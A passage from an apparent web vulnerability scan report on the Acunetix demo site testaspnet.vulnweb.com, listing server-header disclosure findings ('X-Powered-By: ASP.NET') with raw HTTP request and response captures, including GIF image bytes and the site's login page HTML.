Show / hide Request and Response
Request Header - size: 356 bytes.	GET http://testaspnet.vulnweb.com/images/comment-before.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 248 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:54 GMT Accept-Ranges: bytes ETag: "6a79f47099c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 1919
Response Body - size: 1,919 bytes.	GIF89aôÕÿÿÿ`@õðìðéâøôñíåÝüûùú÷õüúùîåÝúøõ÷ôñðèâòìçóìçòíçõñìóíçøôðíåÞúøöüúúüûúú÷ö÷ôðïéâîåÞöðìöñìù÷õõðëùøõïèâøõñù÷öðéãíäÝõñë÷õñûûùîäÝðèãùøöøõðîäÞûúù÷õðöðëíäÞïéã!ù,ôÿ@pH,È¤rÉl:Ð¨tJZ¯Ø¬vËíz¿à°xL.Ïè´zÍn»ßð¸\|N¯Ûïø¼~ÏïûÿB ¡¢£¤¥¦§¨©ª«¬§H ±² , ±²³¾Â ¾Æ³±ÆÇÁÁÅ³Ï¾µ¶¿ºÅ0µºµÆÓ¿Î½¸Ë¾à´½ÇÈ²ÓÆ(²Í½çñé¹îçÜÁì´Þ ¹$ËtõÆ²jÊ#VïØ5}È´ã&/^EaàÈ& =uúHä nCÖf¼.à;½¶äÈÌ_Dán©c<ÿÅ¤Í6²]8êÂÈµ[óô«êF\2}M5ÖÕnìýR0` v´j×²uA¸#ÖªÍp·íÚ¾s3ÌÝk7.Ü´s+>¼Wí[½q·=Ì ÅúZfL7ñe¿9³Å¸4lS+lX-æ¿A#ZvâÚiïÒxn¾¥EsfW¯dÜÓ<ô©O:6êÁÍKüðé¹§~ÝøñÓÍî«ÛsöÃ××ì:¹ðêiAg,÷xsß¶`À 8ðÀ "è@<à .aJ¨aFÐÿz¸` 6ðFè >áHa~(¡!rh"²Èá,B(a/ã'ùâöx$x!)Þ8#8n"&a1zh£þ \ÙdBNØå?&¨ M"xbº£¢ã6vx" 6Ic<j8!6¢$fÙ¡%¡v.Ú"or b¦ ÊIá¥CÉà¨è¢s id¾ ¢J)"{xa$Þ)¦Ö8â°H@$«,Én ì³Ì2¬´ÏB»lµl-¶× -³`A ÝfK®³Ó àÿÁ´è ®·ãNK-´ÎB0¯½òr¯´ÚÖ»,¹Í2»n»ÜVïµörð.¾þªkí³lë-Âßí¼Éz -¼îJ\|ïºð¿ûîÆÉ¾°îÂÓ{ðÃ&CrÀ!?;s¶!\s·ÛëÁÅ§ô²2Èè2Û0Æ¼/»ßRlòÐØKðºPtÁAën, 6!`¤°Í6h/Á b·6b£6Ý·ô½÷ÞuóÍvÜ}/¸â·-xc7ßiÍxàó¸ÞO8à/¹ã&À ·Ü«Ý7ÞÿzÝh®9+lÿwåS>8á/øíºï\|ÞÞyñ.äÉ½öîríBî÷õd¿ÍºÙwW~ûÙº.¸Þe®{ó\|OÏ7ê#nzûlÀváì_÷¥§=ºÜz/·ûßùç:¸I z±s_îG»Öå®mo£øèÀ¶¥M+¸ å×¸Á.m @ (@ À.ð@ p!N¨Â°'á]¨CÀgxª H\!p0/,"cx&°<lâRHB.QTÔa]ÈÃ.¾ðe!.PÄ,ñOü!HÆ¢ÿq`ôágÈÅzñ8¤ nØÃâQUäáÏhÆ&²à¢F¸D60d,"«Ã1<á#sXDú±jÄ!%ÈÉ'v0\|ãMéJÖñN$£ 5ÙÊÀ),e&GÅñÆ<2'iJCþÐ:DfÏCTÑDd×¨ÆÖQ ä3×xM&òÍÌã')@HTÀ0< ðNxZàñD@<å©OXÀÿÜg<ÿYOzúsµ*PÏ~êð´ç>ÿ9Ï\|öhC-Px:4¢PèB+ÏyT$hHúP¤ å§AÊÏwÞ3¨Gå©PêÓ"ÝéA êPz´¥å)BéÙ>ô§)C¡Ï"´¤ÕhPç Töt'¸©@Tô¢ø<èXjR¬B dhEúÐî/@S¯ZÖ '(+USÒ-©?ÏØV§ôÌªcÑØ¥zÔ§'}§UÒ»Â3A;
URL	http://testaspnet.vulnweb.com/images/logo_acunetix.gif
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 336 bytes.	GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 248 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:55 GMT Accept-Ranges: bytes ETag: "7228247199c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 2506
Response Body - size: 2,506 bytes.	GIF89a2&æÿÿÿf@æÜÏá ???Í¿¬³¡¿¿¿jEdâØÊàÕÇnJþþýmIïïïÀ°uRÚÎ¾¦vº©///___ÓÆµOOO\|[Æ·£ÏÏÏßßß m¯¯¯á oooå1:æ:Bã$ä$-êU[èMTímráä3øÊÌíæ/8ítzðâ!öÂÅüééâìdjò²´âçFMâêioòüâãûÞßç@GèCJæBIö×Øïé_eúæçó£§õ¼½ô¨¬â!ä(ã&áë`fòº½ùßáôÅÇùØÙñ £ïýïïýîïúììñ¦¨èHNñ±÷ÓÔö²µüäåäýïðïõÌÍòüïïõ°³üíîï}!ù,2&ÿ ¡¢£¤¥¦§¨©ª«¬ ³´µ¶·¸¹º»¼½¾¿À» ®ÅÆÇÈÉÊÈ°²ÁÏÐÑÒÓÐÃËØÙÚÛÜ¡ÍÔàáâãÂÄÝçèéêßäî¶¿ïÒÖëûüýÆíøÞpÏ×A«óÇ°á©ppÜÀ½ ¨LÃ ? @2Â6Á]ü¥1å/ÉªÑÑHi ÉTFåRÜJòY,K¢JEø)¥v4cÒ±¹¶cª[·Dÿ`e¨Wu(Ñ+Ë«¥^\jW¥xKxª%sûÕ½.ï__\|wù}\+00 kJ#ñ¾ÅûSÞY×äÑ,Âlbóf.<«½Nt. `Á·&XÐ ¨fù>ÜÖòZ+äd ÂÓ´>Ä`ü\$PDÁ ¿÷R]Ek×®áh$H jÄ$mPBå·_ èÇß'$%ø"$]I4I8Ø¡4@¡°ß©ØvT] \-pÝY\´À!Ø4À-4¢Áÿèè{£ÈßN 1Ê@Õ I¡`°A@-ÀV¢I(&I"`^"Y'izR×âI¨¸XFhðqLWÜIpÀpÜãÑ25z¢ÌCvÓ àè¡Þ8Ë5 PÞ£ã!êäzð½ð\|±b&&a}g~Røb©+ÔÉkÐoDa´À^0"!>H'wzbf¸é+:u´,j¥@0¨ßµëä¤Bò8wGªz§ ,jÁ³L'A½ñÂ(È«KÅjJ©@CÿAÁÄù(#ä_2@Øg~\É¸&K@+Ë¢mbæÈ´ùI.À¶Y+/b-Uu=L)ttpËÓ~Êc ¨×.ÔñÇ0-óB\Î5©`aCa&´0ÊmV("ü)J @1HÒÏe«sÌòÊOÈ~2£¤LnÏßþòV_n0çé0×d5Ùù69µ¥ªæ6ð~ §·ì«Üé¸`ÍyZòÛ\x3¤071@QX ()´ß£¸Ü·ñb7GÀôÔc(,òyBÉ"»R¹ê¸8:ÿ¼¹à;¨¾ær©Öðº^¾ 7Ýï¢R?û(:¦'.¸'5(LpÐ¬Kd^ò3æe/ÏÖ²t=» \¢ÀPÀâ½£;ïøLS¿ZX}K£¼&c¾Îé(i»J1´¡b0ùº@"xB¹A7@ 3%ðÊÅ AQD$(§HÅ 2æ$@Î^áA]ÐâÅqÑB1¢#¶Èû¾&ùPÉaÕnÁ¤×æ~¢XAa¤æF@ Ã#^ÉduB"evA¾yâCã°x2î`rëb.æÆYÌÿcWEIDQ¸0]úf1$ãAeT 2ÒðlªXÛ[ f@BaÐT(Å+&F¶ÀeÂzt$k"d/ÎàÖÐ8¶OlÁYÝi1ÑõHi©«ÚÇGJV²Î·@ªìx(â !P±Þ¶ùºLøfôdMíÎ¤Ì0é q0?Øc¨2]¥ @Ð\|¢À«>`YèS§BÔÍ¨´zAÀa `ØiPÓxPUÃZ:P/`êºðç'\|I#@ïÿÊ <AÕ·ÓpÖPvÅ<qà.!¢'"P²-C[l5:´ÉEKi^#Ê¡:ÅÕháä£T( µxqtCsg_H¥¤Â©6\|Àwì1 pýlx ?¦3½ÌêLðU]¾Å Ê0t%2o{@}[)E¢>Ë( lK$X¼ê6ÃÅV¿5÷¬`ßU`çDØWÙb ÞWgë9$ìc£ÅQ a¨Â´¦RU?Z BôTÞâQ ÀÄ µ§,ôdBAÉGj´vZÙÿrýô`A±h¥¨- P Lå `ô§ °:i Øq0Ð Äø³¸Þ¸÷ð-Åì;&$òuEd CQHñ@ý¤xc&c"xrNÄ £æ/îdÚûGQ\Á-&ØºhA6xî tÏÌçYp-½ßKÚ,%A*èA~SaÀ +ÐÁóLiU¹ÏJqØÂjá0râ²Ò Æó¥1í¢nv;Åá'êVdÔ¤N MaÌÕÐÕ¸.sJcëzØQ84«sMìÚì×ÈT'ÍìlÀ:ÙÐN ¡Mme<;ÚÈ¶Æ&¶Íín{ûÛ¨¸ÇMîrS";
URL	http://testaspnet.vulnweb.com/images/rss.gif
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 326 bytes.	GET http://testaspnet.vulnweb.com/images/rss.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:55 GMT Accept-Ranges: bytes ETag: "8e76327199c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 134
Response Body - size: 134 bytes.	GIF89a¢ÿfÿÿÿÿÈ¤?}3ÿW!ù,K(ºÜþ@«½8ËÌ»Ý^T`Ö¢ßT±pP2PS¤]Ç{å'î6ü¹h:0YîvH[wd2U¯eN$Úr=xL.Ï;
URL	http://testaspnet.vulnweb.com/login.aspx
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13421
Response Body - size: 13,421 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22839
Response Body - size: 22,839 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3Lm